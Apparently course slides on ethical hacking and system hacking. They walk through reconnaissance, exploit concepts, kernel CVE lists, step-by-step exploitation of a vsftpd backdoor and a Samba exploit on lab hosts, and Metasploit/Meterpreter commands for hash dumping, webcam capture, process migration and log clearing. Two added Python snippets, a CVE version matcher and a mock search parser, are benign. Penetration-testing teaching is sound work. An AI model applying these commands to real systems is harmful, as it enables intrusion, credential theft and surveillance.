System Hacking

The document outlines the phases and techniques of ethical hacking, including footprinting, scanning, enumeration, and system hacking. It details the stages of system hacking, common exploit types, and the use of tools like Metasploit for penetration testing. Additionally, it discusses kernel exploits and recent vulnerabilities affecting both Windows and Linux systems.

System Hacking

@mmar

Hassan 1
PHASES OF ETHICAL HACKING

2
FOOTPRINTING
 Identify target
 Identify IP, network topology (DNS, subdomains, whois, web)
 Identify ASN (https://ipinfo.io/)
 Identify servers if possible
 Network information, technologies
 Identify admins (whois, https://lookup.icann.org/en/lookup)
 Gather org information
 Gather passwords (Have I Been Pwned, breachdirectory)
 Gather employees' emails, phone nos (theHarvester, hunter.io, LinkedIn)
 Gather documents (Google dorks), e.g.: army secret site:*.gov.in filetype:pdf

Scanning &
Enumeration
3
SCANNING AND ENUMERATION
 Identify live hosts: ping sweep (-sn), netdiscover
 Identify open ports: scan for all ports, TCP ports, UDP ports
 Identify services: detect service version (-sV)
 System enumeration: collect usernames, system names, emails etc.
 Web enumeration: subdomains, vhosts, DNS

Hack it
4
System Hacking

 System hacking is an attempt to break into a computer system that you normally
have no (or limited) access to
 The goals of system hacking are typically to:
 Access confidential data or restricted services
 Obtain a password or credential that can be used elsewhere
 Use the system as a “stepping stone” for further attacks into the network
 Disrupt the system’s functionality

Hassan 5
System Hacking - Stages

1. Gain access
 Password cracking
 OS vulnerabilities
 Service and application vulnerabilities
 Social Engineering
 Physical access
2. Escalate privilege
 Kernel or service flaws
 Social Engineering

Hassan 6
System Hacking - Stages

3. Execute applications
 Pivot
 Plant RATs
 Run payloads
 Exfiltrate data
4. Hide files
 Leave malicious files on the system
 Steganography
 Alternate Data Streams (ADS)
5. Cover tracks
 Remove artefacts
 Clear logs and history
Hassan 7
Exploits and Payloads

 An exploit takes advantage of a weakness


 It gets you into the system
 A payload is the code that is executed through the exploit
 It does the real damage

Hassan 8
Bind Shell Payloads
 The attacker sends an exploit to the victim
 The payload opens a listening back door on the victim machine
 The attacker then connects to that back door
 The attacker must be able to get past the victim’s firewall to connect to the back
door

Hassan 9
Reverse Shell Payloads
 The attacker sends an exploit to the victim
 The payload makes a client connection from the victim’s machine back to the attacker
 The victim is making an outbound connection past their firewall
 The attacker need not contend with the victim’s firewall to use the connection
 The attacker must be prepared with a “handler” that listens for incoming connections
 The attacker’s firewall must permit a connection to the incoming port

Hassan 10
Exploit Chaining
 Exploit Chaining is the act of using multiple exploits to form a larger attack
 Success may depend on all exploits doing their part
 Distributed nature makes them complex and difficult to defend against
 Some chained exploits must run consecutively
 Some run in parallel

Hassan 11
Exploit Chaining

 Chain 1: Social Engineering Attack → Standard User Account → MS_17_010 Eternal Blue → Administrator prompt → PWN!
 Chain 2: Malicious Adobe PDF → UAC VNC Injection → Kitrap0d Local Priv Esc → Administrator prompt → PWN!
 Chain 3: Distract a Guard → Tamper with Alarm System → Break into Office → Plant Kali Raspberry PI in internal network → Use PI to launch attacks → PWN!

Hassan 12
Common Exploit Types

Category: Description
Remote code execution: Any condition that allows attackers to execute arbitrary code
Buffer or heap overflow: A programming error that allows attackers to overwrite allocated memory addresses with malicious code
Denial of service: Any condition that allows attackers to use resources so that legitimate requests can't be served

Hassan 13
Common Exploit Types

Category: Description
Privilege escalation: Any condition that allows attackers to gain elevated access to a compromised system; often performed through kernel exploits
Information disclosure: Any condition that allows attackers to gain access to protected information
Security feature bypass: A software weakness that allows attackers to circumvent policies, filters, input validation, or other security safeguards
Directory traversal: Any condition that allows attackers to access restricted areas of a file system

Hassan 14
Rings of Privilege

 Intel CPU architecture
 Started with i386
 Hardware enforces privilege levels and process separation

Hassan 15
Kernel Exploits
 The kernel is the core part of the Windows or Linux operating system
 It manages memory, schedules processing threads, and manages device I/O
 It runs in Ring 0 and has priority over all other processes
 Exploits that attack the kernel can escalate privileges and can destabilize the entire system

Hassan 16
Kernel Exploit Suggesters
 Kernel exploit suggesters exist for both Windows and Linux
 Watson (Windows)
 A .NET tool designed to enumerate missing KBs and suggest exploits for Privilege Escalation vulnerabilities
 https://github.com/rasta-mouse/Watson
 Linux Exploit Suggester
 Designed to assist in detecting security deficiencies for a given Linux kernel/Linux-based machine
 https://github.com/mzet-/linux-exploit-suggester

Hassan 17
Recent Windows Kernel Exploits
 CVE-2019-0836 LUAFV PostLuafvPostReadWrite SECTION_OBJECT_POINTERS Race Condition (Windows 10 1809)
 CVE-2019-0841 Microsoft Windows 10 < build 17763 - AppXSvc Hard Link Privilege Escalation
 CVE-2020-0796 SMBGhost (Windows 10 1903/1909) Remote Code Execution
 CVE-2019-1458 Wizard Opium (Windows) Local Privilege Escalation
 CVE-2019-1125 Windows Kernel Information Disclosure
 CVE-2019-0708 Windows 7 (x86) - 'BlueKeep' Remote Desktop Protocol (RDP) Remote Windows Kernel Use After Free

Hassan 18
Recent Linux Kernel Exploits
 CVE-2022-0847 Linux Kernel 5.8 < 5.16.11 - Local Privilege Escalation (DirtyPipe)
 CVE-2020-12352, CVE-2020-12351 Linux Kernel 5.4 - 'BleedingTooth' Bluetooth Zero-Click Remote Code Execution
 CVE-2019-13272 Linux Kernel 5.1.x - 'PTRACE_TRACEME' pkexec Local Privilege Escalation
 CVE-2019-19241 Linux 5.3 - Privilege Escalation via io_uring Offload of sendmsg() onto Kernel Thread with Kernel Creds

Many more are available on exploit-db.com!
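A CVE list like the one above is what an exploit suggester compares against `uname -r`. As an added example that is not from the slides or from either suggester, the following Python checks a kernel release string against the affected versions exactly as the slides state them (the table and sample version strings are constructed; real suggesters carry far more entries, and distro kernels often backport fixes, so a match is a prompt to check the vendor advisory rather than proof of exploitability):

```python
import platform
import re

# Affected versions as the slides state them (constructed table, not real
# exploit-suggester data): "range" = [lo, hi) upstream versions,
# "series" = the major.minor series the slide names.
KERNEL_CVES = [
    ("CVE-2022-0847", "DirtyPipe LPE", "range", (5, 8, 0), (5, 16, 11)),
    ("CVE-2020-12351", "BleedingTooth Bluetooth RCE", "series", (5, 4), None),
    ("CVE-2020-12352", "BleedingTooth Bluetooth RCE", "series", (5, 4), None),
    ("CVE-2019-13272", "PTRACE_TRACEME pkexec LPE", "series", (5, 1), None),
    ("CVE-2019-19241", "io_uring sendmsg() offload LPE", "series", (5, 3), None),
]

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?")


def parse_kernel_version(release):
    """Turn a `uname -r` string such as '5.15.0-76-generic' into (5, 15, 0).
    Distro suffixes (-generic, -arch1-1, .el8) are ignored; returns None
    when the string does not start with major.minor."""
    m = _VERSION_RE.match(release.strip())
    if not m:
        return None
    major, minor, patch = m.groups()
    return (int(major), int(minor), int(patch or 0))


def suggest(release):
    """CVE ids from KERNEL_CVES whose stated versions cover this release."""
    version = parse_kernel_version(release)
    if version is None:
        return []
    hits = []
    for cve, _desc, kind, lo, hi in KERNEL_CVES:
        if kind == "range" and lo <= version < hi:
            hits.append(cve)
        elif kind == "series" and version[:2] == lo:
            hits.append(cve)
    return hits


def report(release):
    """One 'CVE: description' line per match, for a patch-status review."""
    by_id = {row[0]: row[1] for row in KERNEL_CVES}
    return [f"{cve}: {by_id[cve]}" for cve in suggest(release)]


if __name__ == "__main__":
    # Check the kernel this script runs on (meaningful on Linux only).
    local = platform.release()
    print(f"kernel {local}:")
    for line in report(local) or ["no listed CVE matches this version"]:
        print("  " + line)
```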

Hassan 19
SPECTRE AND MELTDOWN
 “Catastrophic” kernel exploits
 CVE-2017-5754, CVE-2017-5753, CVE-2017-5754
 Impacts over 2800 vulnerable CPU types (Intel, IBM PowerPC, AMD, ARM)
 They break a fundamental assumption in operating system security
 That an application running in user space cannot access kernel memory
 Meltdown exploits out-of-order execution on the CPU
 It can leak kernel memory into user mode long enough for it to be captured by a side-channel cache attack
 Spectre
 Tricks a CPU into speculatively executing a malicious code path
 The malicious path is rolled back, but metadata is left in a cache that could also be captured by a side-channel attack
 In the cloud, an application in one VM could access the memory of another VM
 An attacker could rent an instance on a public cloud
 Collect information from other virtual machines on the same server
Hassan 20
Manual Exploitation

searchsploit samba 2.2

Hassan 21
Manual Exploitation

cp /usr/share/exploitdb/exploits/multiple/remote/10.c ~/exploit.c
gcc -o samba exploit.c
chmod 755 samba
./samba -h
./samba -b 0 -c <attacker IP> <target IP>

 Many exploits are available only in their source code format
 Text file that must be compiled into an executable
 Download or copy the uncompiled exploit to the current directory
 Research how to use the exploit
 Read the source code
 Find info on Exploit-db.com
 Ask Uncle Google

Hassan 22
Manual Exploitation
Compiling
Exploits

 If the exploit requires a library, then install it. For example:
 sudo apt-get install libssl-dev
 Compile the source code
 Use the appropriate GNU C compiler based on the extension (gcc for .c, g++ for .cpp)
 Syntax: gcc -o <output executable> <source file>
 You may need to point to the present directory so gcc/g++ can find the source
 gcc -o myexploit ./coolsploit.c
 g++ -o mybestsploit ./verycool.cpp
Hassan 23
Manual Exploitation
Running
Exploits

 You may need to give yourself permission to run the script or executable:
 chmod 777 ./pwn.py
 chmod 777 ./mysploit
 Run a script from its interpreter
 python ./pwn.py 192.168.182.130
 Execute the program
 ./mysploit 192.168.182.130

 Note: If the directory you are running the exploit from is not in your path environment
variable, you can indicate the current directory with ./

Hassan 24
Scan to Pwn - Example

1. In Kali Linux, open a terminal
2. Update your copy of the Exploit-db database
searchsploit -u
3. Ping sweep to identify possible targets
nmap -sP 192.168.182.1-255
4. Metasploitable is a possible target. Use nmap to conduct a port scan and identify service versions
nmap -A 192.168.182.130
5. Nmap identifies the FTP service version as vsFTPd 2.3.4
6. Search Exploit-db.com for more information. The search returns a Python script: vsftpd 2.3.4 - Backdoor Command Execution Python script exploit

Hassan 25
Scan to Pwn - Example

7. See if you have an exploit for vsFTPd
searchsploit vsftpd
8. Searchsploit has the Python script at /unix/remote/49757.py
9. Get more information as well as the path to the exploit
searchsploit -p 49757
10. The path to the exploit is /usr/share/exploitdb/exploits/unix/remote/49757.py
11. Highlight and copy the path to the clipboard
12. Copy the exploit to your home directory. You can rename the copy as you wish:
cp /usr/share/exploitdb/exploits/unix/remote/49757.py pwn.py

Hassan 26
Scan to Pwn - Example

13. See if the exploit has built-in help
python ./pwn.py -h
14. The exploit only needs the address of the target
python ./pwn.py <target>
15. Run the exploit with the required argument
python ./pwn.py 192.168.182.130
16. You now have root access
 You don't see a prompt, but you can run commands such as ls, whoami, pwd

Hassan 27
Metasploit Framework
 Metasploit Framework (MSF) has long been a tool used by security professionals to
test networks and systems
 It was created by HD Moore in 2003 as a penetration testing tool
 Written mostly in Ruby. Modules are organized into categories
Module Category: Description
Auxiliary: Scanners, crawlers and fuzzers
Exploits: Attack (kick the door in)
Payloads: Pwn (toss in the grenade)
Encoders: Evade detection, change bad exploit characters
Evasion: Generate your own evasive payloads
NOPS: Advanced buffer overflows
Post: Escalate privilege, additional tasks
Hassan 28
Metasploit Framework
 Use an exploit and payload together to attack a target
 The exploit gets you into the victim
 The payload performs the actual task you want to accomplish

Hassan 29
Metasploit Framework
 Metasploit Framework is already installed in Kali Linux
 You’ll want to update/upgrade Kali to get the latest Metasploit modules:
 sudo apt update && sudo apt upgrade
 If you installed Metasploit yourself in another Linux distro, you can update it manually
at a terminal prompt:
 msfupdate

Hassan 30
Metasploit Framework

 From the Kali desktop click Applications > Exploitation Tools > Metasploit Framework

Hassan 31
Metasploit Framework
 Metasploit has its own command prompt that is NOT case sensitive
 It can run a number of basic BASH/zsh commands as well as its own commands
 At the Metasploit prompt, you can search for exploits, payloads, and other modules
 search [<options>] [<keyword>:<value>]
 Prepending a value with '-' will exclude any matching results
 If no options or keywords are provided, cached results are displayed
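As an added example (not from the slides or from Metasploit's own code), the following Python models the search syntax just described, free-text terms, keyword:value filters, the '-' exclusion prefix and the cached result set, over a small constructed module catalogue; the paths are real Metasploit module paths (two of them appear on these slides), while the names and platforms are abbreviated for the example:

```python
# Constructed catalogue for the example: the paths are real Metasploit module
# paths; names and platforms are abbreviated, not copied from the framework.
MODULES = [
    {"path": "exploit/multi/handler", "name": "generic payload handler", "platform": "multi"},
    {"path": "post/windows/gather/smart_hashdump", "name": "windows smart hashdump", "platform": "windows"},
    {"path": "post/linux/gather/hashdump", "name": "linux password hashdump", "platform": "linux"},
    {"path": "auxiliary/scanner/portscan/tcp", "name": "tcp port scanner", "platform": "multi"},
    {"path": "exploit/windows/smb/ms17_010_eternalblue", "name": "ms17-010 eternalblue", "platform": "windows"},
]

KEYWORDS = ("type", "platform", "name", "path")


def parse_query(query):
    """Split 'type:post -platform:linux hashdump' into (negate, key, value)
    terms. A leading '-' excludes matches; a token whose prefix is not a
    known keyword is treated as free text."""
    terms = []
    for tok in query.split():
        negate = tok.startswith("-")
        tok = tok[1:] if negate else tok
        key, sep, value = tok.partition(":")
        if sep and key in KEYWORDS:
            terms.append((negate, key, value.lower()))
        else:
            terms.append((negate, None, tok.lower()))
    return terms


def _matches(module, key, value):
    """True if a single term matches the module (free text: path or name)."""
    if key is None:
        return value in module["path"] or value in module["name"]
    if key == "type":  # module type is the first path component
        return module["path"].split("/", 1)[0] == value
    if key == "platform":
        return value in module["platform"].split()
    return value in module[key]


class Console:
    """Holds the last result set so an empty search shows cached results."""

    def __init__(self, modules=MODULES):
        self.modules = modules
        self.cached = []

    def search(self, query=""):
        """Return numbered (index, path) results; every positive term must
        match and no negated term may match."""
        terms = parse_query(query)
        if not terms:
            return self.cached
        hits = [m["path"] for m in self.modules
                if all(_matches(m, k, v) != neg for neg, k, v in terms)]
        self.cached = list(enumerate(hits))
        return self.cached

    def use(self, index):
        """Resolve a result number from the last search, like 'use 13'."""
        return dict(self.cached)[index]
```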

Hassan 32
Metasploit Framework

Module Path

 The module path is the physical path to the module within the metasploit-framework
directory

Hassan 33
Selecting Exploits

Hassan 34
Exploits and Payload Options
 Exploits and payloads each have their own set of options
 Some exploits will automatically choose a payload that you can change if desired
 Some options have default values that you can change if desired
 Some options require input from you
 Typical options include:
 RHOSTS (target IP)
 RPORT (target port)
 LHOST (listener host/handler)
 LPORT (listener port)
 SMBDomain (the domain or computer name - the default is “.” )
 SMBUser (the user account you are using for the exploit)
 SMBPass (the user’s password)
Hassan 35
Reverse Payload LHOST Option
 You can configure a reverse payload to connect back to a handler on:
 the attacker
 another machine
 Convenient when you want to dedicate a machine to wait for reverse connections
 Example diagram: Target 192.168.1.5, Attacker 192.168.1.100, Handler 192.168.1.200

Hassan 36
Using Exploits

Hassan 37
Using Exploits

Hassan 38
Using Exploits

Hassan 39
Using Exploits
 Show options one last time to make sure you didn't miss anything
 show options
 Then launch the exploit with either command:
 exploit or run

Hassan 40
Multiple Metasploit Sessions
 Metasploit allows you to run multiple attacks on different targets simultaneously
 An exploit will typically move you into a session as soon as you get it
 You may wish to back out of that session
 Leave it running in the background
 Start another exploit against a different target
 meterpreter > background
 You can toggle between sessions
 meterpreter > sessions <session ID>
 You can also send a command to multiple sessions at once
 sessions -C screenshot -i 2,3

Hassan 41
Multiple Metasploit Sessions
sessions: List all sessions you have acquired
sessions -h: Get help with the sessions command
sessions -l: List active sessions
sessions -i <session ID>: Switch to a different session (example, switch to session 2: sessions -i 2)
sessions -c <command> -i <session ID, session ID, …>: Run an OS shell command on multiple sessions at once; targets must have the same/compatible OS (example: sessions -c "net user" -i 2,3)
sessions -C <command> -i <session ID, session ID, …>: Run a meterpreter command against multiple sessions at once (example: sessions -C screenshot -i 2,3)
sessions -k <session ID>: Kill a session (example, kill session 2: sessions -k 2)
sessions -K: Kill all sessions
sessions -u <session ID>: Upgrade a shell to meterpreter; use when an exploit only gives you a shell

Hassan 42
Meterpreter Commands Categories
 Core commands
 File system commands
 Networking commands
 System commands
 User Interface commands
 Webcam commands
 Audio output commands
 Elevate commands
 Password database commands
 Timestomp commands (manipulate file timestamps)

Hassan 43
Meterpreter Commands Categories
 help
 search
 The backslash is an escape character
 Use double backslashes when giving the Windows path
 Use a backslash in front of a space in the path
search -d c:\\documents\ and\ settings\\administrator\\desktop\\
 upload
 upload <file> <destination>
 download
 download <file> <path to save>
 To recursively download an entire directory, use the download -r command

Hassan 44
Meterpreter Commands Categories
 execute
 Run a command on the victim
 shell
 Drop to the victim’s command prompt
 webcam_list
 List webcams
 webcam_snap
 Tell a webcam to take a picture
 ps
 Use to find a process ID (PID) or parent process ID (PPID)
 migrate
 Use to migrate meterpreter to another running process on the victim
 You will need the target PID

Hassan 45
Meterpreter Commands Categories
 hashdump
 Each output line is in the following format: Username:SID:LM hash:NTLM hash:::

 run credcollect
 Runs a script that dumps hashes as well as collects system tokens

 getuid
 Display the user that the Meterpreter server is running as on the target

 getsystem
 Attempt to elevate your current privilege to SYSTEM (higher than admin!)

 sysinfo
 Get information about the exploited target

Hassan 46
Metasploit Post Modules
 Some meterpreter commands might not execute well
 Look for POST modules you can also run to do the desired task
 Background your meterpreter session first before you search POST modules
 After choosing a POST module, set the meterpreter session ID in its options

Hassan 47
Metasploit Post Modules
 Meterpreter command hashdump isn't working
 Instead use the post/windows/gather/smart_hashdump module
 In this example the meterpreter session is 5; the smart_hashdump module is 13
background
sessions
search post hashdump
use 13
set session 5
run

Hassan 48
Metasploit Process Migration
 Meterpreter runs in the exploited process
 You can move meterpreter to a different (more stable) running process
 Explorer.exe is an excellent choice since it will always be running so long as there
is a logged on user
 You can also try migrating to system processes such as winlogon or services
 You will need to identify the process ID (PID) or its name
 In meterpreter, run the ps command to find a process, its name, and the PID
 Then run either command:
 migrate -N <process name>
 migrate <process ID>
Hassan 49
MSF Venom
 Msfvenom allows you to generate payloads
 Msfvenom will allow you to access all payloads available in the Metasploit framework.
Msfvenom allows you to create payloads in many different formats (PHP, exe, dll, elf,
etc.) and for many different target systems (Apple, Windows, Android, Linux, etc.)

Hassan 50
MSF Handlers
 Similar to exploits using a reverse shell, you will need to be able to accept incoming
connections generated by the MSFvenom payload. When using an exploit module, this
part is automatically handled by the exploit module
 We can use Multi Handler to receive the incoming connection. The module can be
used with the use exploit/multi/handler command
 Multi handler supports all Metasploit payloads and can be used for Meterpreter as well
as regular shells

Hassan 51
MSF Handlers
 For example, to use the module, we will need to set the payload value
(php/reverse_php in this case), the LHOST, and LPORT values

Hassan 52
MSF Aux Modules
 Metasploit has a number of modules to scan open ports on the target system and
network. You can list potential port scanning modules available using the search
portscan command

Hassan 53
MSF Aux Modules
 Metasploit allows you to quickly identify some critical vulnerabilities with built-in vulnerability scanners that could be considered "low hanging fruit".

Hassan 54
Thanks

Hassan 55
